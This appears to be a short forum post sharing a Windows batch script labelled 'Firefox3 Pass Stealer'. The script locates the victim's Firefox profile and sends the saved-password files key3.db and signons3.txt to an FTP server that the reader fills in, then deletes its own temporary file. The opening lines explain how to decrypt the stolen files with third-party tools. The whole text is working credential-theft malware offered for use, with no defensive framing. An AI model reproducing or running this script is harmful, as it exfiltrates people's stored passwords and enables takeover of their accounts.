basically it takes the key3.db and signons3.txt and send to your ftp server
you can decode them a few ways:
1. create a new firefox profile and place the files in the profile directory
2. use firepassword http://securityxplod...irepassword.php
3. use passwordfox http://www.nirsoft.n...passwordfox.zip
cls
@echo Firefox3 Pass Stealer
@echo Written by illwill
:: make sure you edit the ftpsite, user and pass
echo off
PUSHD "%UserProfile%\Application Data\Mozilla\Firefox"
IF NOT ERRORLEVEL 1 FOR /F "tokens=2 delims==" %%A IN ('TYPE profiles.ini ^| FINDSTR.EXE /R /B /I /C:"Path="') DO SET Profile=%%~nxA
POPD
echo open SITENAME.COM>>c:\$.tmp
echo user USERNAME>>c:\$.tmp
echo PASSWORD>>c:\$.tmp
echo cd public_html>>c:\$.tmp
echo put "%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\signons3.txt">>c:\$.tmp
echo put "%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\key3.db">>c:\$.tmp
echo quit >>c:\$.tmp
ftp -v -i -n -s:c:\$.tmp
del c:\$.tmp












